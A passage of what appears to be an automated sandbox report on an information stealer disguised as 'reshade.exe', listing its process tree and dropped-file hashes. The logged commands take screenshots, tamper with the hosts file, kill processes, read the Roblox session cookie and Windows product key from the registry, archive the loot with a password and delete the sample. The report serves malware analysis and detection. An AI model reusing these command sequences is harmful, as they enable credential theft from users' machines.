IAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                            5⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:5672
                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3m4k251r\3m4k251r.cmdline"
                                                                                              6⤵
                                                                                                PID:6088
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES832A.tmp" "c:\Users\Admin\AppData\Local\Temp\3m4k251r\CSC1C83D27F6513403EB098833482D4845E.TMP"
                                                                                                  7⤵
                                                                                                    PID:5476
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                              4⤵
                                                                                                PID:5908
                                                                                                • C:\Windows\system32\tree.com
                                                                                                  tree /A /F
                                                                                                  5⤵
                                                                                                    PID:6056
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  4⤵
                                                                                                    PID:6096
                                                                                                    • C:\Windows\system32\tree.com
                                                                                                      tree /A /F
                                                                                                      5⤵
                                                                                                        PID:3704
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                      4⤵
                                                                                                        PID:6104
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                          5⤵
                                                                                                          • Drops file in Drivers directory
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:5188
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                        4⤵
                                                                                                          PID:3712
                                                                                                          • C:\Windows\system32\tree.com
                                                                                                            tree /A /F
                                                                                                            5⤵
                                                                                                              PID:5368
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                            4⤵
                                                                                                              PID:5208
                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                5⤵
                                                                                                                • Drops file in Drivers directory
                                                                                                                • Views/modifies file attributes
                                                                                                                PID:5388
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                              4⤵
                                                                                                                PID:5600
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  tasklist /FO LIST
                                                                                                                  5⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  PID:5840
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                4⤵
                                                                                                                  PID:5636
                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                    tree /A /F
                                                                                                                    5⤵
                                                                                                                      PID:5848
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    4⤵
                                                                                                                      PID:1416
                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                        tree /A /F
                                                                                                                        5⤵
                                                                                                                          PID:5592
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4400"
                                                                                                                        4⤵
                                                                                                                          PID:5956
                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                            taskkill /F /PID 4400
                                                                                                                            5⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:5984
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4400"
                                                                                                                          4⤵
                                                                                                                            PID:5920
                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                              taskkill /F /PID 4400
                                                                                                                              5⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              PID:6032
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
                                                                                                                            4⤵
                                                                                                                              PID:2916
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill /F /PID 408
                                                                                                                                5⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:3484
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "taskkill /F /PID 408"
                                                                                                                              4⤵
                                                                                                                                PID:2676
                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                  taskkill /F /PID 408
                                                                                                                                  5⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:2448
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3376"
                                                                                                                                4⤵
                                                                                                                                  PID:2228
                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                    taskkill /F /PID 3376
                                                                                                                                    5⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:3528
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3376"
                                                                                                                                  4⤵
                                                                                                                                    PID:5328
                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                      taskkill /F /PID 3376
                                                                                                                                      5⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:3592
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2368"
                                                                                                                                    4⤵
                                                                                                                                      PID:2240
                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                        taskkill /F /PID 2368
                                                                                                                                        5⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:3504
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2368"
                                                                                                                                      4⤵
                                                                                                                                        PID:5176
                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                          taskkill /F /PID 2368
                                                                                                                                          5⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5444
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2624"
                                                                                                                                        4⤵
                                                                                                                                          PID:5132
                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                            taskkill /F /PID 2624
                                                                                                                                            5⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:5476
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2624"
                                                                                                                                          4⤵
                                                                                                                                            PID:5208
                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                              taskkill /F /PID 2624
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5172
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2748"
                                                                                                                                            4⤵
                                                                                                                                              PID:5848
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                5⤵
                                                                                                                                                  PID:5380
                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                  taskkill /F /PID 2748
                                                                                                                                                  5⤵
                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                  PID:6072
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2748"
                                                                                                                                                4⤵
                                                                                                                                                  PID:2836
                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                    taskkill /F /PID 2748
                                                                                                                                                    5⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:6048
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:5508
                                                                                                                                                    • C:\Windows\system32\getmac.exe
                                                                                                                                                      getmac
                                                                                                                                                      5⤵
                                                                                                                                                        PID:5436
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1832"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5440
                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                          taskkill /F /PID 1832
                                                                                                                                                          5⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:5608
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1832"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5276
                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                            taskkill /F /PID 1832
                                                                                                                                                            5⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:6000
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3388"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:772
                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                              taskkill /F /PID 3388
                                                                                                                                                              5⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:5856
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3388"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5472
                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                taskkill /F /PID 3388
                                                                                                                                                                5⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:6016
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5964
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:5968
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3580
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3680
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3Z3JN.zip" *"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:4820
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\rar.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI11882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3Z3JN.zip" *
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3888
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3656
                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                        wmic os get Caption
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:4760
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3564
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:5188
                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                              wmic computersystem get totalphysicalmemory
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:5192
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2204
                                                                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                  wmic csproduct get uuid
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4704
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:2624
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                      PID:2460
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:6140
                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                        wmic path win32_VideoController get name
                                                                                                                                                                                        5⤵
                                                                                                                                                                                        • Detects videocard installed
                                                                                                                                                                                        PID:4224
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:5176
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4724
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\Downloads\reshade.exe""
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:6052
                                                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                                                            ping localhost -n 3
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Runs ping.exe
                                                                                                                                                                                            PID:4812
                                                                                                                                                                                    • C:\Users\Admin\Downloads\reshade.exe
                                                                                                                                                                                      "C:\Users\Admin\Downloads\reshade.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4448
                                                                                                                                                                                      • C:\Users\Admin\Downloads\reshade.exe
                                                                                                                                                                                        "C:\Users\Admin\Downloads\reshade.exe"
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:3056
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:2224

                                                                                                                                                                                    Network

                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                    Downloads

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      2B

                                                                                                                                                                                      MD5

                                                                                                                                                                                      d751713988987e9331980363e24189ce

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      6KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      b8689e9d9ae1ad937788042693cc362e

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      2991a28008ac161392694837096cb58a035df45a

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      f53dbef5a2583abbee62c8ec178c390e5336489a7c1e1a55ea205cb1f62c424e

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      8b42d8b65f7020f44bd03e34b683c0903a05306a3d106ce871ebfb0038b2155e241e8ede0fdbb8755afdd357b768f070020c34d79d6b18a5f98ae83dea381596

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      129KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      535e841f98ef9a819c7a4858d6fe5c85

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      135c1006d7f25d11e4d7fb852513a949ae86fb3f

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      972adcde067f769466aab2df6944382401fe246b9ca31f7a3a937090817674b7

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      5f2f22f7a3d0761ec7e922139e8ee34f8d397f036ba8206451df398596dfaacd739db1673704328bc39fc87011600a7b73192fc89663a1a3682baa5e7149c9bb

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      2KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      944B

                                                                                                                                                                                      MD5

                                                                                                                                                                                      d28a889fd956d5cb3accfbaf1143eb6f

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      157ba54b365341f8ff06707d996b3635da8446f7

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\VCRUNTIME140.dll
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      106KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      49c96cecda5c6c660a107d378fdfc3d4

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      00149b7a66723e3f0310f139489fe172f818ca8e

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_bz2.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      48KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      c413931b63def8c71374d7826fbf3ab4

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      8b93087be080734db3399dc415cc5c875de857e2

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_ctypes.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      58KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      00f75daaa7f8a897f2a330e00fad78ac

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      44aec43e5f8f1282989b14c4e3bd238c45d6e334

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_decimal.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      106KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      e3fb8bf23d857b1eb860923ccc47baa5

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_hashlib.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      35KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      b227bf5d9fec25e2b36d416ccd943ca3

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      4fae06f24a1b61e6594747ec934cbf06e7ec3773

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_lzma.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      85KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      542eab18252d569c8abef7c58d303547

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      05eff580466553f4687ae43acba8db3757c08151

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_queue.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      25KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      347d6a8c2d48003301032546c140c145

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      1a3eb60ad4f3da882a3fd1e4248662f21bd34193

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_socket.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      43KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      1a34253aa7c77f9534561dc66ac5cf49

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      fcd5e952f8038a16da6c3092183188d997e32fb9

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_sqlite3.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      56KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      1a8fdc36f7138edcc84ee506c5ec9b92

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      e5e2da357fe50a0927300e05c26a75267429db28

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\_ssl.pyd
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      65KB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      f9cc7385b4617df1ddf030f594f37323

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      ebceec12e43bee669f586919a928a1fd93e23a97

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\base_library.zip
                                                                                                                                                                                      Filesize

                                                                                                                                                                                      1.4MB

                                                                                                                                                                                      MD5

                                                                                                                                                                                      32ede00817b1d74ce945dcd1e8505ad0

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      51b5390db339feeed89bffca925896aff49c63fb

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI11882\blank.aes
                                                                                                                                                                                      Filesize

